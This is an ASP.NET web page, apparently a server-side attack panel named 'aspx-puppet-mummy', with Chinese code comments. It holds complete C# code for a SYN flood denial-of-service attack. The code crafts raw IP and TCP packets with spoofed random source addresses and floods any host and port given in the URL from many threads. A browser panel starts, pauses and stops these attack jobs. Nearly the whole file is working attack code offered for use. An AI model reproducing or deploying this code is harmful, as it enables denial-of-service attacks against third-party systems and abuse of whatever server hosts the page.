<%@ Page Language="C#" AutoEventWireup="true" ValidateRequest="false"%>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Threading" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<SCRIPT runat="server">
//author : kj021320(nonamed)
//blog : http://blog.csdn.net/kj021320/
static ArrayList jobScheduler = new ArrayList();//JOB Scheduler
//控制攻击类
public class DDosAttack
{
public string targetHost = "";
public ushort targetPort = 0;
public int attackThread = 0;
Thread[] thread = null;
public string errMsg = "";
public int state = 0;//0进行 1暂停 2停止
public void run()
{
thread = new Thread[attackThread];
syn ddos = new syn(targetHost, targetPort);
try
{
for (int i = 0; i < attackThread; i++)
{
ddos.father = this;
thread[i] = new Thread(new ThreadStart(ddos.synFlood));
thread[i].Start();
}
}
catch(Exception e)
{
errMsg = e.Message;
}
}
}
public struct ipHeader
{
public byte ip_verlen; //4位首部长度+4位IP版本号
public byte ip_tos; //8位服务类型TOS
public ushort ip_totallength; //16位数据包总长度(字节)
public ushort ip_id; //16位标识
public ushort ip_offset; //3位标志位
public byte ip_ttl; //8位生存时间 TTL
public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.)
public ushort ip_checksum; //16位IP首部校验和
public uint ip_srcaddr; //32位源IP地址
public uint ip_destaddr; //32位目的IP地址
}
public struct psdHeader
{
public uint saddr; //源地址
public uint daddr; //目的地址
public byte mbz;
public byte ptcl; //协议类型
public ushort tcpl; //TCP长度
}
public struct tcpHeader
{
public ushort th_sport; //16位源端口
public ushort th_dport; //16位目的端口
public int th_seq; //32位序列号
public uint th_ack; //32位确认号
public byte th_lenres; //4位首部长度/6位保留字
public byte th_flag; //6位标志位
public ushort th_win; //16位窗口大小
public ushort th_sum; //16位校验和
public ushort th_urp; //16位紧急数据偏移量
}
//这3个是ip首部tcp伪首部tcp首部的定义。
public class syn
{
private uint ip;
private ushort port;
private EndPoint ep;
private Socket sock;
private ipHeader iph;
private psdHeader psh;
private tcpHeader tch;
public DDosAttack father;
public Random rand;
public UInt16 checksum(UInt16[] buffer, int size)
{
Int32 cksum = 0;
int counter;
counter = 0;
while (size > 0)
{
UInt16 val = buffer[counter];
cksum += Convert.ToInt32(buffer[counter]);
counter += 1;
size -= 1;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (UInt16)(~cksum);
}
//SYN攻击类
public syn(string _ip, ushort _port)
{
IPHostEntry ih = Dns.GetHostByName(_ip);
ip = Convert.ToUInt32(ih.AddressList[0].Address);
IPEndPoint _ep = new IPEndPoint(ih.AddressList[0], _port);
port = _port;
ep = _ep;
ipHeader iph = new ipHeader();
psh = new psdHeader();
tch = new tcpHeader();
sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1);
rand = new Random();
}
//循环发送数据
public void synFlood()
{
//iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint));
iph.ip_verlen = (byte)(4 << 4 | Marshal.SizeOf(iph) / Marshal.SizeOf(ip));
//ipv4,20字节ip头,这个固定就是69
iph.ip_tos = 0;
//这个0就行了
iph.ip_totallength = 0x2800;
//这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800
iph.ip_id = 0x9B18;
//这个我是拦截ie发送。直接添上来了
iph.ip_offset = 0x40;
//这个也是拦截ie的
iph.ip_ttl = 64;
//也是拦截ie的,也可以是128什么的。
iph.ip_protocol = 6;
//6就是tcp协议
iph.ip_checksum = UInt16.Parse("0");
//没计算之前都写0
iph.ip_destaddr = ip;
//ip头的目标地址就是要攻击的地址,上面传过来的。
psh.daddr = iph.ip_destaddr;
//伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。
psh.mbz = 0;
//这个据说0就行
psh.ptcl = 6;
//6是tcp协议
psh.tcpl = 0x1400;
//tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400
tch.th_dport = port;
//攻击端口号,上面传过来的
tch.th_ack = 0;
//第一次发送所以没有服务器返回的序列号,为0
//tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0));
tch.th_lenres = (byte)((Marshal.SizeOf(iph) / 4 << 4 | 0));
//tcp长度
tch.th_flag = 2;
//2就是syn
tch.th_win = ushort.Parse("16614");
//拦截ie的
tch.th_sum = UInt16.Parse("0");
//没计算之前都为0
tch.th_urp = UInt16.Parse("0");
//这个连ip都是0,新的攻击方法有改这个值的
while (true)
{
while (father.state == 1) { Thread.Sleep(5000); }
if (father.state == 2) { break; }
string srcAddress = rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255);//随机伪IP
iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(srcAddress).Address);
psh.saddr = iph.ip_srcaddr;
ushort sourcePort = Convert.ToUInt16(rand.Next(1, 65535));
byte[] bt = BitConverter.GetBytes(sourcePort);
Array.Reverse(bt);
tch.th_sport = BitConverter.ToUInt16(bt, 0);
tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646));
//上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序
iph.ip_checksum = 0;
tch.th_sum = 0;
//因为循环中,所以每次必须把这2个已有数的清0才可计算
//byte[] psh_buf = new byte[sizeof(psdHeader)];
byte[] psh_buf = new byte[Marshal.SizeOf(psh)];
Int32 index = 0;
//index = pshto(psh, psh_buf, sizeof(psdHeader));
index = pshto(psh, psh_buf, Marshal.SizeOf(psh));
if (index == -1)
{
father.errMsg="构造tcp伪首部错误";
return;
}
index = 0;
//byte[] tch_buf = new byte[sizeof(tcpHeader)];
byte[] tch_buf = new byte[Marshal.SizeOf(tch)];
//index = tchto(tch, tch_buf, sizeof(tcpHeader));
index = tchto(tch, tch_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造tcp首部错误";
return;
}
index = 0;
//byte[] tcphe = new byte[sizeof(psdHeader) + sizeof(tcpHeader)];
byte[] tcphe = new byte[Marshal.SizeOf(psh) + Marshal.SizeOf(tch)];
Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length);
index += psh_buf.Length;
Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length);
index += tch_buf.Length;
tch.th_sum = chec(tcphe, index);
index = 0;
//index = tchto(tch, tch_buf, sizeof(tcpHeader));
index = tchto(tch, tch_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造tcp首部错误";
return;
}
index = 0;
//byte[] ip_buf = new byte[sizeof(ipHeader)];
byte[] ip_buf = new byte[Marshal.SizeOf(iph)];
//index = ipto(iph, ip_buf,sizeof(ipHeader));
index = ipto(iph, ip_buf, Marshal.SizeOf(iph));
if (index == -1)
{
father.errMsg="构造ip首部错误";
return;
}
index = 0;
//byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)];
byte[] iptcp = new byte[Marshal.SizeOf(iph) + Marshal.SizeOf(tch)];
Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
index += ip_buf.Length;
Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
index += tch_buf.Length;
iph.ip_checksum = chec(iptcp, index);
index = 0;
//index = ipto(iph, ip_buf, sizeof(tcpHeader));
index = ipto(iph, ip_buf, Marshal.SizeOf(tch));
if (index == -1)
{
father.errMsg="构造ip首部错误";
return;
}
index = 0;
Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length);
index += ip_buf.Length;
Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length);
index += tch_buf.Length;
//if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader)))
if (iptcp.Length != (Marshal.SizeOf(iph) + Marshal.SizeOf(tch)))
{
father.errMsg="构造iptcp报文错误";
return;
}
try
{
//socket.sendto把构造好的数据发送出去
sock.SendTo(iptcp, ep);
}
catch
{
father.errMsg="发送错误";
return;
}
}
}
public UInt16 chec(byte[] buffer, int size)
{
Double double_length = Convert.ToDouble(size);
Double dtemp = Math.Ceiling(double_length / 2);
int cksum_buffer_length = Convert.ToInt32(dtemp);
UInt16[] cksum_buffer = new UInt16[cksum_buffer_length];
int icmp_header_buffer_index = 0;
for (int i = 0; i < cksum_buffer_length; i++)
{
cksum_buffer[i] =
BitConverter.ToUInt16(buffer, icmp_header_buffer_index);
icmp_header_buffer_index += 2;
}
UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length);
return u_cksum;
}
//这个是计算校验,把那些类型不一样的全转为16位字节数组用的
public Int32 ipto(ipHeader iph, byte[] Buffer, int size)
{
Int32 rtn = 0;
int index = 0;
byte[] b_verlen = new byte[1];
b_verlen[0] = iph.ip_verlen;
byte[] b_tos = new byte[1];
b_tos[0] = iph.ip_tos;
byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength);
byte[] b_id = BitConverter.GetBytes(iph.ip_id);
byte[] b_offset = BitConverter.GetBytes(iph.ip_offset);
byte[] b_ttl = new byte[1];
b_ttl[0] = iph.ip_ttl;
byte[] b_protol = new byte[1];
b_protol[0] = iph.ip_protocol;
byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum);
byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr);
byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr);
Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length);
index += b_verlen.Length;
Array.Copy(b_tos, 0, Buffer, index, b_tos.Length);
index += b_tos.Length;
Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length);
index += b_totallen.Length;
Array.Copy(b_id, 0, Buffer, index, b_id.Length);
index += b_id.Length;
Array.Copy(b_offset, 0, Buffer, index, b_offset.Length);
index += b_offset.Length;
Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length);
index += b_ttl.Length;
Array.Copy(b_protol, 0, Buffer, index, b_protol.Length);
index += b_protol.Length;
Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length);
index += b_checksum.Length;
Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length);
index += b_srcaddr.Length;
Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length);
index += b_destaddr.Length;
if (index != size/* sizeof(IcmpPacket) */)
{
rtn = -1;
return rtn;
}
rtn = index;
return rtn;
}
//这个是把ip部分转为字节数组用的
public Int32 pshto(psdHeader psh, byte[] buffer, int size)
{
Int32 rtn;
int index = 0;
byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr);
byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr);
byte[] b_psh_mbz = new byte[1];
b_psh_mbz[0] = psh.mbz;
byte[] b_psh_ptcl = new byte[1];
b_psh_ptcl[0] = psh.ptcl;
byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl);
Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length);
index += b_psh_saddr.Length;
Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length);
index += b_psh_daddr.Length;
Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length);
index += b_psh_mbz.Length;
Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length);
index += b_psh_ptcl.Length;
Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length);
index += b_psh_tcpl.Length;
if (index != size)
{
rtn = -1;
return rtn;
}
else
{
rtn = index;
return rtn;
}
}
//这个是把tcp伪首部转为字节数组用的
public Int32 tchto(tcpHeader tch, byte[] buffer, int size)
{
Int32 rtn;
int index = 0;
byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport);
byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport);
byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq);
byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack);
byte[] b_tch_lenres = new byte[1];
b_tch_lenres[0] = tch.th_lenres;
byte[] b_tch_flag = new byte[1];
b_tch_flag[0] = tch.th_flag;
byte[] b_tch_win = BitConverter.GetBytes(tch.th_win);
byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum);
byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp);
Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length);
index += b_tch_sport.Length;
Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length);
index += b_tch_dport.Length;
Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length);
index += b_tch_seq.Length;
Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length);
index += b_tch_ack.Length;
Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length);
index += b_tch_lenres.Length;
Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length);
index += b_tch_flag.Length;
Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length);
index += b_tch_win.Length;
Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length);
index += b_tch_sum.Length;
Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length);
index += b_tch_urp.Length;
if (index != size)
{
rtn = -1;
return rtn;
}
else
{
rtn = index;
return rtn;
}
}
//这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。
}
</SCRIPT>
<%
string action = Request.QueryString["Action"];
if (action != null && !"".Equals(action))
{
if ("AddToAttack".Equals(action))
{
string host = Request.QueryString["host"];//取得主机名字
string port = Request.QueryString["port"];//取得开始port
string thread = Request.QueryString["thread"];//取得线程
DDosAttack da = new DDosAttack();
da.targetHost = host;
da.targetPort = Convert.ToUInt16(port);
da.attackThread = Convert.ToInt32(thread);
da.run();
jobScheduler.Add(da);
da = null;
}
else if("del".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num = Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if (da!=null)
{
da.state = 2;//停止了线程
jobScheduler.RemoveAt(num);
}
da = null;
}
}
else if ("Pause".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num=Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if(da!=null){da.state=1;}
da=null;
}
}
else if("Continue".Equals(action))
{
string id = Request.QueryString["id"];
if(id!=null)
{
int num=Convert.ToInt32(id);
DDosAttack da = (DDosAttack)jobScheduler[num];
if (da != null) { da.state = 0; }
da=null;
}
}
else
{
//显示作业调度池
Response.Write("<TABLE><TR><TD>JOB</TD><TD>THREAD</TD><TD>STATE</TD><TD>HOST</TD><TD>PORT</TD><TD>ERR MSG</TD><TD>ACTION</TD></TR>");
int count = jobScheduler.Count;
for (int i = 0; i < count;i++ )
{
jobScheduler.TrimToSize();
DDosAttack da = (DDosAttack)jobScheduler[i];
string dstate = "";
string operate = "";
if(da!=null)
{
switch (da.state)
{
case 0: dstate = "running"; operate = "<input type=button value=Pause onclick=\"ThreadOperate('Pause'," + i + ")\">"; break;
case 1: dstate = "pause"; operate = "<input type=button value=Continue onclick=\"ThreadOperate('Continue'," + i + ")\">"; break;
}
}
Response.Write("<TR><TD>" + i + "</TD><TD>" + da.attackThread + "</TD>");
Response.Write("<TD>" + dstate + "</TD><TD>" + da.targetHost + "</TD><TD>" + da.targetPort + "</TD>");
Response.Write("<TD>" + da.errMsg + "</TD><TD><input type=button value=Drop onclick='DropThread(" + i + ");'>" + operate + "</TD></TR>");
da = null;
}
Response.Write("</TABLE>");
}
GC.Collect();
Response.End();
return;
}
%>
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head><title>ISTO aspx-puppet-mummy</title>
<style type="text/css">
v\:*{behavior:url(#default#VML);position:absolute;}
body,td{font-size: 12px;}
body,td{font-size:12px;}
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
input,select{font-size:12px;color:#000000;}
input{border-color:"#000000";color:#008800;background-color:#333333;}
body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
td{white-space:nowrap;}
a{color:black;text-decoration:none; color:#008800;}
</style>
<script language="javascript">
//common
String.prototype.trim = function()
{
return this.replace(/(^\s*)|(\s*$)/g, "");
}
String.prototype.ltrim = function()
{
return this.replace(/(^\s*)/g, "");
}
String.prototype.rtrim = function()
{
return this.replace(/(\s*$)/g, "");
}
function createXmlHttpRequest(){//create AJAX CONSOLES
if(window.ActiveXObject){
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}else if(window.XMLHttpRequst){
xmlHttp=new XMLHttpRequst();
}
}
//ref需要信息的组件
function getTheMessage(ref){
if(xmlHttp.readyState==4){
if(xmlHttp.status==200){
var replaceStr;
replaceStr=xmlHttp.responseText;
replaceStr=replaceStr.trim();
if(replaceStr!=""&&ref){
ref.innerHTML=replaceStr;
}
return replaceStr;
}else{
return "";
}
}else{
return "";
}
}
//str:connection HTTP URL
//code:eval the code
function openUrlXmlHttpRequstEval(str,code){
url=str;
createXmlHttpRequest();
xmlHttp.open("get",url,true);
xmlHttp.onreadystatechange=function tmp(){eval(code);};
xmlHttp.send();
}
//str:connection HTTP URL
//ref:replace the HTML consoles
function openUrlXmlHttpRequstReplace(str,ref){
url=str;
createXmlHttpRequest();
xmlHttp.open("get",url,true);
xmlHttp.onreadystatechange=function tmp(){getTheMessage(ref);};
xmlHttp.send();
}
</script>
<script language="javascript">
//user define functions
//add to scan
function post(){
if(S.host.value!=""){
if(parseInt(S.port.value)<=65535){
if(!isNaN(S.port.value)&&parseInt(S.port.value)>0){
var url="?Action=AddToAttack&host="+S.host.value+"&thread="+S.thread.value+"&port="+S.port.value+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");S.port.value="";S.host.value="";
alert("add success");
}else{
alert("set port error");
}
}else{
alert("set port error");
}
}else{
alert("HOST can't empty");
}
}
//view pool
function viewSchedulerPool(){
openUrlXmlHttpRequstReplace("?Action="+Math.random(),document.all.pool);
}
//drop the scanning Thread
function DropThread(num){
if(confirm('Are U sure?')){
var url="?Action=del&id="+num+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");
}
}
function ThreadOperate(ope,id){
if(confirm('Are U sure?')){
var url="?Action="+ope+"&id="+id+"&"+Math.random();
openUrlXmlHttpRequstEval(url,"");
}
}
setInterval("viewSchedulerPool()",3000);
</script>
</head>
<body text="#00ff00" vLink="#008000" aLink="#008000" link="#008000" bgColor="#000000" style="background:url(http://p.blog.csdn.net/images/p_blog_csdn_net/kj021320/302272/o_puppet-mummy.jpg) no-repeat center center;">
<center>
Scheduler Pool:
<div id="pool"></div>
<hr />
<form method="POST" name='S'>
HOST:<input type="text" name="host" />
D-PORT:<input type="text" name="port" size="4" maxlength="5" />
THREAD:<select name="thread"><option value="1">1</option><option value="3">3</option><option value="5">5</option><option value="10">10</option><option value="20">20</option><option value="30">30</option><option value="50">50</option></select>
<input type="button" value="AddToAttack" name="Action" onclick="post();" />
</form>
</center>
<v:Textbox id="istoFullname" style='FONT-SIZE:30;Z-INDEX:3201;FILTER:alpha(opacity=100,style=2) blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=2) glow(color=#d9f281,strength=3) ;LEFT:10%;COLOR:#f17a35;FONT-FAMILY:@黑体;TOP:35%' inset='5pt,5pt,5pt,5pt'> - = Information Security Technology Organization = - </v:Textbox>
<a onclick="javascript:window.open('http://www.isto.cn');">
<v:Textbox id="isto" style="FONT-SIZE:80;Z-INDEX:3177;FILTER:alpha(opacity=100,style=2) blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=8) glow(color=#cbb749,strength=1) invert;LEFT:23%;COLOR:black;WORD-BREAK:break-all;FONT-FAMILY:Arial Black;TOP:45%" inset="5pt,5pt,5pt,5pt" print="false">-= I.S.T.O =-</v:Textbox>
</a>
</body>
</html>
